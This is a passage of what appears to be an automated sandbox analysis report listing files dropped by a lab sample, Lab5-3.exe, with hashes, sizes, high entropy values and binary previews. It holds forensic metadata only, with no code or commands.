                                                                                                          SSDEEP:48:EGv2mUISRwEjAuFDKvHfUTid3hBaUoSGFcmeykEdEElU92i:EGv2mJ+8u80Gx0uKeY2ElUJ
                                                                                                          MD5:6F272770DB41C05C58A897302770FF22
                                                                                                          SHA1:735510FC64E40D71F59D4E616A1BDBC825E0ABD6
                                                                                                          SHA-256:41813169C6FF7D53B781BF8CA6089FACA1B1BE6677FA5770140F0911DC6C6D26
                                                                                                          SHA-512:324845C1123C25562F40FE1348E80CD63D35B24BA02BD82DD96C901D7FCADAE4BA3358BBFDB088AD264342CDAF25D5FFBC96D6B6BC5BF603DF889B74F02D194A
                                                                                                          Malicious:false
                                                                                                          Preview:.;q.....b|!...4AW.5....&....`..N8.Y....*...K.....9..-.5tC..0.i`.N.1.cI.?.$TI...T....6;s.......<.?Bw.3)Mht.R.JR.........8.[7`.....M.iF...*).IO.F.(/..d.Y..mf.......+z0...E.t...o..[.Jo..]A......Z.."...8z.......f...."c..\M.Eg.._.x.X n.-.......{*>..>..o....U._O./.I.0..2Gj.M_\.{#.}.).f...$....Z'._.hGj..L... ..?...g...v...}.or...:Z.U..i..w......K....j.{R..!K.O.s...tQ.....\.k3.......;q..#S:......6.@..._.7.Fj......e...v6X.BJ.(.J....vh.V.|.....ni.5/K..gi.`..[.2BF.Fxo..6..)5...2W.9.h..;,%.. .C3I..t....D.w8..........wp.8.5....0].....R.*.bOQ..pa.`8.c.....}.B....e...:X..2..........!...V...5p.+.(.^R....5.-H....D6...#cP1F...&./!8...D..4....n.,i.Ik..+.q.n...5j...PO.X...!h..-$..a....b.z..&.W....z.=B".......V)..>\].f._..E..j4.i.g.z.j....I.....2K8.~{R.{|.*.j.........28..6y.3['.P..c.w..65...$.7`.._b..+.xr. .U...!..^..x.7.E%...2]Bi..4...g*.$%.T.|.x...e.$..3..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.90917799024297
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:SlcpaEm1DaTqmU3tJPHfUTid3hBaUoSGFcmeykEdEElU92i:ucpaZDeCUGx0uKeY2ElUJ
                                                                                                          MD5:65090F4C40CAC52BAACE59952A886CF8
                                                                                                          SHA1:33C37CF500E067117245D653972E183BD4A65D7C
                                                                                                          SHA-256:C675A26024A6A82CF1EB47DC01954F64D1DE9C7A697E0EB5B1F8AF4EFC3FD9FC
                                                                                                          SHA-512:2487564108A7AC5FC36F4D505CB63D0D9298D401D512D28833EC51B13D1D17BDAA650CFFEF727C1242125487D86AFEBCAA7B220594AB81F4A99255DF23643C9A
                                                                                                          Malicious:false
                                                                                                          Preview:..N...l.!.....}.nF|V...F.#..'..w..wj..lHy......F.U..,....Ix..N.M.0L%.Af{.J.@td\&O...f.U.....J.m.o_.o..o.l......./8.....C^.].MQ.....z...#..@bt..g.b.J...AO.....\}.U....w.....q.a:..^.B|...".%.HF.....}D.B.ilJ........i...i....o../......pI..Tr...8*D....[6...R]..'.].....'vX-.&(.(1f18B....!d.m7.>.F.>.0..`hu....yT..g.......=..8\Wn.h$.N..Y...5.%.#L.vr..]SA..K..._..V........ U........@.&.....0..sm...C.........E../.FdX...XX,.T...a..sB.a......Z..&..Q.Eo.h.`.=^.5.X.7.G...Ia..u1u1...".....i..n.-'):..Z.....Yw...=./-..$.GL].].....T..`f.[...O_F.)..l.)_j.....;hF.^B...Ka.r`.OL~}o.s..|>.....v...`..~.Q^..G..)L.XV./.......c%..,...&4...&...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.925222554000117
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:b7o4pE/Snc6xXZBEggZHEHfUTid3hBaUoSGFcmeykEdEElU92i:b7JLxxmGx0uKeY2ElUJ
                                                                                                          MD5:9469F08B4857234961B7E2998BAA9286
                                                                                                          SHA1:F2656A65619A392BC8E610010A6838C65E8B5ACF
                                                                                                          SHA-256:51DBE5D94A25B5229F1AB3E600EEE149E49362C56D46E31D5DD9C30E33A335CC
                                                                                                          SHA-512:F39EC476D23E834598BC253BBD5B06B5A164FCB97BC38178E5B090A200BBD89B363389B269F303C24C29F3647692AA78B32B81E9A46B23603C6AF21998AF46E5
                                                                                                          Malicious:false
                                                                                                          Preview:;..}.J.....]...z.A\.8.......E.a...4Y..{..z$z.JRp..xMG.....F.O$.E..g....v...g....~o..[@..(..%+Na..47....$\P...(../Q...U...r.(&c..x;?.b..(G..pT....B]"..s{..kA..).D..h*.d.=L..*@a....Iu..[.. ):......5.6....8..:..Q...p..)..&.\Rq."../..p..o.B2.x....:.7./.kd..>.J..j...fA...HR..k...om7Y....:+.1O..S...&...d..A...).......#.)..K..Z...7l[..-HA......UxL!H....W.....qlw... ........g.^...IP\..Z.+..B.5C!.aC(>tSL......y.GM.;..'|. /....@.'h..=b.A.Q.Q.v....,#J....k.V...}..._.D...O'..ki@.G.pZ.G..I....N...t.e.....Iq.....>HA..w....i.....5..`4.q`.g..D:......X..)|...[sQ.......\8H`h..V$S....7....#.*...5M.<c..6.r.M.R....:U..FWQ.X.......W2.\.N.Ts....r=.............Bc.18.Z.P.c...g.....T...6...>.]^n..O..z.9...@....e...s.}3[\...+.Q.4..K3.$...&...2{.].P..d..qt..)3_..I...!bO..B...i......O.oG..G..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.919430839416415
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:0DwTqZY/Su3op6wWXqJdMHfUTid3hBaUoSGFcmeykEdEElU92i:0DwTqZBua6wWQLGx0uKeY2ElUJ
                                                                                                          MD5:4C6E5FC78EAF59E7E639E47E188476C8
                                                                                                          SHA1:3C9A03101F5D4BF5A6095A0AC88BCF5897B66FB9
                                                                                                          SHA-256:E13F7E5ABBB9C049DEEEA88C83C2322E6139DD84F19B9EF64371B9F6E8329551
                                                                                                          SHA-512:7AE8888B6BCF1CE97F0D704D7D910EAD24268D28595D4BCA38433E6FB666FD2EA6C802EAF5FA440BC55620C4DBC7562CFD12B357AEAEDDAEDE46CCCE2E35B167
                                                                                                          Malicious:false
                                                                                                          Preview:.w...'h'.|fA...@..F.O.1yY..?....k...`.4..^q.x.C.'..12.....a.H.@SV...(...7...s.(?..M..:G.C..Q.... ..8..vDNO.C.4A...4.br.0...^.=...|. .... ..`J...*n...x..d..K.......5.....)j%C..kgR.Y.J.....Ht. ...:...=.....9....>...h.+z.]....$..vy...&..k.e..)Tf;..E..p.s.k..;l.m#..W................|.I.!.l`..Ex....H."..O#....SS#..ySB|A3M.Z6Q..x..N.....'.^.?...S..W.#9.e..6..Hs...w...-..a.>..B....(Fe.]$.|.2...Z.N.*...):).@...Y....SL.*.1.c...9.B..(..3g....5'.......d.@...J_.K.-a.....ar<$./...,..M..&d.$.-..H.YR.W...p.u...\...r.:.M....l.u>'._^.~.>...x..+G..-i....J.....|.C?7...L.......GF...q.p....x..].et.Y....V.P....2%..J<.2....,|-...k.E..x.c.-~. w...-s.x...G.M..|._.[J>.2.9...I.&.+p.cG.K4..c3...aY'.........L..bq.4.....k.|?.b.....h..5i....u..D..{L#....XA...G.......<V..=....83.>.*.m..N./...V.u/.Y'....M...Yu......R..*.U.{.Pk....].g....kT!r..d.\ .S.u7.9'.{..... ....S..uWj.&.K.W.9?..rV.......7.b.J.f.`$..4..y..^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.9354915106189345
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:EmLsfSPGD8XwE8Lrb4L3V/YAUOPHHfUTid3hBaUoSGFcmeykEdEElU92i:E+siXw1Q3OrGx0uKeY2ElUJ
                                                                                                          MD5:FC8C74A3B2C079C392A2AF74CCFE6361
                                                                                                          SHA1:AD910749A0CB05A725BA5D92A4342F4ED2DD469F
                                                                                                          SHA-256:638E432E2FD5E8D1597E50A7119C7D2B3F7BD01AFB4718FD09EFDC35A9D82724
                                                                                                          SHA-512:8BFC611B697E2AAB87D38B4B58E7048BBA8BA4A1FF9DFBD053F1422427A7F670F1A49C50EA62376258A3BE9C24207244EB14A34DF5C97C663F79D39EF742F0B8
                                                                                                          Malicious:false
                                                                                                          Preview:Vt{+=./.".d.........;..Z....D......VU....16.<..........$df}X......0.......ey.a..p.&..Y..c...b.I.Q..\......E..%..q.......9.D..nu/.W.?,..s...k.8.T?..4.F..b.W..\C...Y.o.....J...=.j..P.9.]../.....6..iQ.MP`...6...|v4T..p..'.....>...B..3.Y4,...`.......$3..6..z(...n.k.F.....;....{H.....}.....r.wz"Q.e0.L.u..:...^.b..L...qs.P.DN.....0e.8.c..O.p.8YMl..-r\9HQ...i.yCM.1* g/...DB...zD.T.b.Z......='.z..A.o.j......Zv....l..a;.y+.....M...tC.8.[.^..q...]=)#..h%...|.;A...,...n.&....R..9......X............;....#g.".<3..;6U<....:....b.L..=..f....P..4.n...2.P]..~.Q..6=)m.-....n..#C.[.........&.........w...C......r.....a,.*@....v........Y..mJ..J....<.....g..{{.....(.#...H...f..o0..4\....<..^.s.g..g....K.|...\l1};..[(.z..b`KyT.[..m....x...;\<. ....(...%A..9...I#n......(..........C...=.D..=.....I..... .iN.......$_2.ED7.y..T..C. s..sj.....%...2C.Y5...7...h..M.8.7.FQA+...\....H.....)aT.=..7.Yf...Jx...).L..{..p.?....\..^.>._.....c.c..@..8.....pv..q......ky.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.908441658332063
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:qasCzsfY1cQ8Yu9jlDVHfUTid3hBaUoSGFcmeykEdEElU92i:qaKpYuHDuGx0uKeY2ElUJ
                                                                                                          MD5:495F06E306EB227358636E485E093503
                                                                                                          SHA1:85B2FAC5487AA7EAA716F3F4A99A9929B148AC7E
                                                                                                          SHA-256:3B0664B6BA25D04024E4C9EDB6B8D87741552FD4B72A8E19DC5789FAE1400EEF
                                                                                                          SHA-512:638A46E923D1AF1F713D5BC82E1685B5CDED7D0F4C4E5375B21EABAE7522741250318BA420CDE30117FC4B8FC91E7F1DDB4C06AD8A6A13F1FF9E8AE8E398CEDA
                                                                                                          Malicious:false
                                                                                                          Preview:....sI.+|..g..........j.+.l4.L.r8.?..........,.....f...1i..pLAp..l..W0..5.p.9-.X..E?...k*.3...1.j...@...u...g......rV.%.-D.u.(I..........G"....A.....9.'`%,..I./.w.S..eu..A........,.J..^.w.M. n...W.....+..z2..@b5.U.2..}..f.r....(..o@=..c....(b..m.A..)...../......k8...@]..W.M..U..Y,..E.~.....,.D......rL...q{..bh...X.....O.........b...v....B}...%......K..0.<.....L..s../J..d..\.s2..q..d^..IK\e.JV...N.Ke......n#..i.i.;..^\...2.....=......zd~...Ol....|.R.$]..j.s.....-.&p...;.(.VU..dt...Fs.'...S..4.}.....ce......=..6.3.J......L.._.....nw....0*..../...p..g}...h..Y.....o......]....=..`]D3..F.....9..6.|..J..$8+..Lq.....H...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.920670874347529
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:DdPRdIyFs5DFygecNbObHfUTid3hBaUoSGFcmeykEdEElU92i:lIyF2jjNbHGx0uKeY2ElUJ
                                                                                                          MD5:B85298DAE4064EE750EF0DFDC8095ED5
                                                                                                          SHA1:A3B42768D97D50FCC121A9DED5275DA3D2217171
                                                                                                          SHA-256:F9F4A46846623715EA278A456BF1A74187DD9F28C06707B6D608651E7E5511F5
                                                                                                          SHA-512:4B3923FE1808797D4E1E6F0445EAC6932B397260F61113480C5A061703E62A9BD477280F457DF6D6255E61B008CAA2ED9D46C351419D24960637AAA3250014C3
                                                                                                          Malicious:false
                                                                                                          Preview:...7;.'{N....,..._..WD.aVi.Dxu.._.!....Yawv."..3.n..(.X.GQ.PP.-9.......zM..[..pv...)..AD.Y.1}..g..Y..4mI4.;.Cv.[....wDC\..~R6.H#^.ou.O...?P!"....{..:..S..[.m!9%.........R..IO...h......K.;...B..3>......%`)l.&Qo.n(.i....`f.7.\.2......0...].#[.)f%.l....2!..!.&3..x-@"<....p.@.i.LC.XT.GU..5...`..?..iiZ..wl.B............J.%E~....\.%S.iX.<o5....#........V.....&.O......+l.......kD.Wo>.-Dw..\....ua....r...yb....h...0..q=.CY...3.....m.;t....[Kt..]..."....L.3.......e.......|.3...|...l9i.Y..Ym&.t....E'.....XwZ.J..J..]~U..@.F..#J.k......[f..QQ...u?..(5}8..@.'8.0p.>...+..q..W..l..W...A.......nE.~.e.....i'.u....H.ko.pZD.i.+...( .5.....XW.........yEC.p..x....(|dR...d|6...N8?..p.2 .d.h.I.e..7.......E.../.....~.s.l_y.........<:@.....Lv7u...l=.j..g.d.]..FH..sb.0(.xC.^:%..SqwO..Qt.+.w..X.@..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.914154754218789
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:BZvzB+NYkHfUTid3hBaUoSGFcmeykEdEElU92i:V+2Gx0uKeY2ElUJ
                                                                                                          MD5:1DC903D887A4BD5E1629E66BC052BFCD
                                                                                                          SHA1:04B33948ED4CD6C6789C80322AB331D8764EABD9
                                                                                                          SHA-256:7BADDD3B3292C6192DCFE708100498697EBC57D09B02A67A744F31884721184D
                                                                                                          SHA-512:9B4E48D1B487E435BF8635F0123C8D39A823CC96F283996303341CC9FA2D40DB6DB71BEE0A2220935AC9906D62BB54B3888552945AA92ACF63F97CCA11C618D2
                                                                                                          Malicious:false
                                                                                                          Preview:.V...9,.*oi..)u#...esn{..s....t..b8...).?...6._........0.'.u.T..A.%R..!.*2..4w.l".@.*I.. ......E...nD........h.?e:E.j...*Af.gL..7....e....'4.}.Z.}D.....U...1.7........f..Y]...*..[.j&"....L.)...3*Iq}*.L...4...1p.c(r|.A....]...K.P{l..IYE..M`....X...Hu......&*w~aq.MD.-...-_6.g......A....*M.g.N...V=.Sm...0.B..vlyt.:..D.x..E.H.Y.d?...c...)..{.x$.mq6.......-.lj..6&....W.@.B.!.+F.......0.....N...I7...Q.....e-cc.?5).A.....D...<.F.c.......8...og?.....b..-....4..sA.HR.w....H;.b.8....7G...GX.~m.&..P...Y.A.Jq..$F*c..*YG'..!...z.k.}...e._...~~y...*'.|x...2....8WU._e.....wf..K....k..8C.h...n..........yC]....3...Z....X.].eB.........^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.90702353445013
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KvhbntEjyI2Bn+CHfUTid3hBaUoSGFcmeykEdEElU92i:KvRtEjv2BiGx0uKeY2ElUJ
                                                                                                          MD5:4E387A4B6D7A499031A6DBA694C7701F
                                                                                                          SHA1:9DF95760226FD1CEDA85E73C651ED67E35D179F5
                                                                                                          SHA-256:69DC4E2759F58DBAF4A1D57DAD7F19352587BCFB36C60851BD38E4B5E816582C
                                                                                                          SHA-512:4C581409AE42EB66DA58EC5C31E36ADAC4DCFD8EA6303EC7BCF313A57BBAD6A87E548BB31886CD6E637DA4B9B9830469C9D7DFD80D65DCAB0C5EFFCF72729E63
                                                                                                          Malicious:false
                                                                                                          Preview: .Pe..9.o.t7.4......T.Y%/.....|.....)...?;..B[1.......N...];;V0'm...\..i]S.$.#W..s..$.[..t..7..C.7.. ;6....7rA^.#5.a...Y..=...r..T4....KB5.*.I9..`.!..I{Y!x.....t.PI....O{;&.j...^.Z.v.{._"...`@...i...v`.uc.)zx.n..S.....P.&.)A.A...1i..x....R.g..)p{......)..OQ...Q.h2.Xy.~/..r0....i..xE_...EOc.@..4..z....I.8.`.;.5U`.....1\?.....t......NO..(]....V.m.}i.e.....[U.rV..K1.m.4....[..[.+..8.qJ.6.G.Z3U....x....9.....NH...A...A...Av.....Y.A...P....9..}.%.N...M...F$...F..'...HN.......i.J..gU-.......S.\...q...i...}..l..N.[..+3..;............fle..o......;.?.VsB.N..I..iG~.y.".E..pR.]O I..w..G..%`.....6]4X.&......!.a......P...Z.K,e.\...-.........6z.MXn+..Z8..a.BE&.-.n%..wBX...9......h.wi|s..........@.l..u...p.{....8.a...-....Q...$.|W...*m..>.\....^M.mM..T..O..s....y..-..h..Y..l6...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.940693001325838
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7d7X7p4nPBRkpoKXgdfkOgKfR+HfUTid3hBaUoSGFcmeykEdEElU92i:7d45RAXQfbrGx0uKeY2ElUJ
                                                                                                          MD5:D9C2CDA47328A35148A7673216972C59
                                                                                                          SHA1:80ECC2B239E33456045B59F0EA201C6DFA4FED0E
                                                                                                          SHA-256:3294AF28F021F6A7F5DD683EAAE77A4D1E56CE4760FDA6280B3D24DD5AF12EC4
                                                                                                          SHA-512:D564894E436CDBEF9E42FCEFD3C03A48C5657FC2C4A1235D6C4F5ADCF878DFF1930CE4BC5074E92783FAE318EB614E5187BD020C4D75D87F1E927752DFC81671
                                                                                                          Malicious:false
                                                                                                          Preview:fa...B,.BA.4.7..Gu.<..77.O.M..8.S....fR].E.8.8......H.EO...KB.r,..c...r.0hM..f.b.*..x..${...b..1w......Ok..[.g}[.Y?."...f..#.......B..p..%V..]j....r...c8...l..W...T..$v.!w.....H....u.p.`.>-...y.ydr.,.T..c..{...d.3#....>....J..r.` j.{R[..G.......k..A..=W.YQ..e.O.-V.....^n.....s...... 99..3u....X.......0.m...-",......<...Sz....YkLU(u..............._....8.7...Xe...W..mP..A..n..sN...\pP ..ps.k...55.V...}.v%....hg.....F+.@...5Z..yfp.8..C-..Xe.r.W..x..{.NRk...q.e}.o.*.XT..!6C.` ^(.].....^I....m~..Jn.Ug6X...l2.o.......q.;...-..s..&?.X...3..~....7...5.....D.i.5a.B.....\.'.....c.Hz.Q..7*7.`.w.Ra.f'....x...H..\..[J.n.....~.^8....2..y..O.L.XY,uc..s.u.s.BqM.......u...Q.Kb...;......=......Z.QWNn....r.}...I<...T..0.[.[*eS5K..sw...+..wi.&....H.....|....1.U... ...%E.[< 'M......z...-.`.\.X.wj.._..=A..9...q.'.M.K:.%@.0.J..cr..t.&....C....H.q.....A.&Z......HF_S......8...-M?......E..YMuR.0...k[-.../..$.#....Z.C...w`.+.r5...P..?..Er..@..P...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.933249255087111
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:C57NFuIUG/z/pPSozSz9XJSSNgbTVwBViNHfUTid3hBaUoSGFcmeykEdEElU92i:CBi8pKozSzJ8K03mGx0uKeY2ElUJ
                                                                                                          MD5:B63EC36CADF24EAF75AB0C146E003AFF
                                                                                                          SHA1:6C8083DF0CAD01001E766946DC2CB38E09CD4602
                                                                                                          SHA-256:76CC4A4A270B56E279D547EE7AF6D244982869C540D693CEBEA60E6B945A80DC
                                                                                                          SHA-512:6DC0359211D10F786C75F0A15B6CC318583358880D1ADD4C2D7A531566160EA48676B58A2FA90CAB602AD45B1640B45973FEABF522FC5A4A65F2C8775E102DA0
                                                                                                          Malicious:false
                                                                                                          Preview:l7..s..7d..:M8.h:.n7..._.....Q..(..M.u.$.4.+).L.b.{u. s5.-d.18^.!.4.M.....B..E.}{$.....T.l....B.',I,I<....R.).....l4....#...R.1A.....,....@...4Ry.qu.......2...9'j...9w.#.@.(b.....&./8..+......f.|.s..|E.>S...M......*..w.Z.\K7zE..7_9.R..J.c#.... .W.A..hq...v..3..H......T.@F......@vW.JAH..2.f.LMOsL%.XL.w.<..@p.)T..RCpH...&2...q.[8.+...vZ......Z..uD.......H.R'.!..Z@.......w...E...?!.^...Kk...:R+..qa}..L.}w...s..B./...i?...........__[.0.C.%...U[ .lqg.9".D"..F...(...b.T.rM..!...v..!Ck3.....i..c...W..)....p.......?.7~W.*.E......r..@/.k...ARat.i"T.g..%.h.Y...Gr.zqm....2{.Q...a....+Z...m.8y..^Hv#.".7G..A.....2X2.3.Di.$..#.\.;-.....U{.K._...I.w.....u.N...~......:g.h......^..S........'..p...}.A.p.{...?.c.=....t.Vx2....?.?........`3B.\\..f@6.AsMaU....c.H.S..!.....@0\.$WV...;D7!O_.d...[...'$.jT.....6G....y.......8.i..c..1C.M..s..e.$Y!&.....*&".S..........':*....n.......M.O.......U|_.*....U..l.'.<.u..N.....[.u...Y.}4........M..n@.?.]^.F......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2656
                                                                                                          Entropy (8bit):7.928810798760735
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:EpPkKfwVSBy+yJP/lMAxxEmqwGFL37t92HfUTid3hBaUoSGFcmeykEdEElU92i:EpLoWMP/mAxxEmqV37vJGx0uKeY2ElUJ
                                                                                                          MD5:7374225BA60DEDF02160670BD97BE22D
                                                                                                          SHA1:0943AEB7C0CC7071AD435C1F517D2CAA921B2015
                                                                                                          SHA-256:8D52D4907A409B4F66C958ECBEBD0FDAD0A3B92213149043DE675272350A8324
                                                                                                          SHA-512:17FD2EB0EE7CAD79236BBEB54EE17D3DD3D8F83D73435227827763D8A36F4AE1E4698DEAF6D83D9CA65915092CF9AD0B953746458C6AB4EA7342500E3DDD2FCB
                                                                                                          Malicious:false
                                                                                                          Preview:/OfE..N..>......y...5..n....B{.....Ne.'.....9kvy...g.'.v.P.*.\.v).....'Y..J...'.9.....>..i.e.6.P....X2...3....`..s..7q..K.4...[...o...N..[8.......Q+.....:......M......-~...P...z.F...D.^S..f.gM.xAK.....G.3j..!.yOep.=...CIM.\..%...b....M.v3mr#...O...)..z..G.a`v0.Cf..u..(..!..[.n%"4g''4..=...}.cf.u.....Q&..._L/^..Z.)7ZP.Gg...{R...-.3.T.....8....._.M...rz&...U.....\_......./.y..LCV%b....jE...q51~..:~..V.g}......].J...R..........!...R2......h..b<=...d.@....2.fK`..Gv..+...o-....u.#.tQ.jO.]..r..8i. ..i......I5..k;.&yf/E..,.Wf|...j......+Wf..B.^..n.y.V.4.$a.Iq..y...r.v.A.k.P.>.....Jb..$.tz..#.m....?.;...(-......=.i...u..@rE^!.)....k.....$..KW.eA.`+;..... ...2[..pP~..)}.=.OH..x.=>../...X.`.....(..B[....f.c...y...y..9...7..0........G. .`.T...4.r..:.....)..L.."..!...9Y).....'.L.k..i..n;G...J..Q...1.....V).....Q.e.......z6...w...W..q..|.}.........f...r....W5....3.....7.,....a.................x..e@^c...m)..3.c.c.j.pa.;..D.^*.G_d.v....K.EzW...zt
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.92687727431847
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:L2LCv+HDZX3hpoOEKNC6+KypijGGVHfUTid3hBaUoSGFcmeykEdEElU92i:cCv+HtHxC6typCGGuGx0uKeY2ElUJ
                                                                                                          MD5:2B089366E6D7BB9AAE6EC754CAF4D711
                                                                                                          SHA1:6EE6645ACDFD811584E5CED67A674A7034C7BBD2
                                                                                                          SHA-256:B86E7F54F482AAB7422D451C3F0DC0C20ED28AEDCF92AEC7F4B2657C66128B90
                                                                                                          SHA-512:D58AC2F9C046FB864335DB92398305F4769E6D5A4EFACA0757D657FBB6E789F553678CACCAB35ABEE7FCF9BC6CA0C226C2D16A7ED908A255CE8EF2994FB0FBBC
                                                                                                          Malicious:false
                                                                                                          Preview:......O.<\C0..*A .....[..0E(.WfGg.{..Y...O>l..B'o>.=].C...i?.N.....3..b......g2....p..d.cPb..."c.>.f....U..O..y.V..?/.a...C......fZ/..a!b......T..oco....yjH.q...e_f.vT.......[..S.{....v....5.57..n;...+......Ao..c.6.......YE`z......-r....^........3../.0...q@..x...z=.).(..ya.E.Y...y.td.y.9..N+Q._y.hG&-<...6........S-m2.ZI7.+.1.p0vx.s..fxA..l...-,2.B..XZ..G..<...e.C....jBS...Qm..vt..W;..2.8<..|...YB..........w...?#].w....i.u.+...w.. .~.V...../.x..}.W.......-..'"| ...s..-....2.5`Q|Nb.Q...D."......WZ@...V.w..&)..kf.-}./....%O#\..).........F...W..J]jW.."IM.u(.z..V......Ed......xmz............'..f~>./...t.0......].I-.I.F.y^[..|...q&h.Y....=..E}t2@....z...F...N5DX-....}Ho1....'....8-Cu`...E%.......b.....N.<.Z.g..3....k...k.....C.......6O$er.TGG..h..9..f#Q`t..J.I.3.$MW!n..G.Q5~1S.K!d.T.j....6.=..y.%l...o{.{,..&*8:.#.?..k...R.V...m.....P.:,L..Dy...c..C.b..X.C:....../....pXE.,l...:pB..EN..J.~.."..F.K2. ..y.'a.y..V.J..Dc-w8..].N....4kT.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2656
                                                                                                          Entropy (8bit):7.927590870012025
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:wXyYNZeeC+4hrXo7fKjBw2h+qgMVKHfUTid3hBaUoSGFcmeykEdEElU92i:wiYPRaXoF2oh4Gx0uKeY2ElUJ
                                                                                                          MD5:0C84B64222A9E1C5D20A8CFF85A706D2
                                                                                                          SHA1:A940DB1D9DDB6F49B5981C8CD22EF5E7D0C595A3
                                                                                                          SHA-256:FBA6B976077162264B4B5D346D10C89AD650E0759A56166366F61E7E1E6C3887
                                                                                                          SHA-512:0E80BF66041F96947E4DDBF1BB91198C334CCBAF2C368C8B5449034255A0AAD321F5FECAA2E61698FA7D11C9239CDCD65255E5C121C165B43A5D51F2E9DFA66F
                                                                                                          Malicious:false
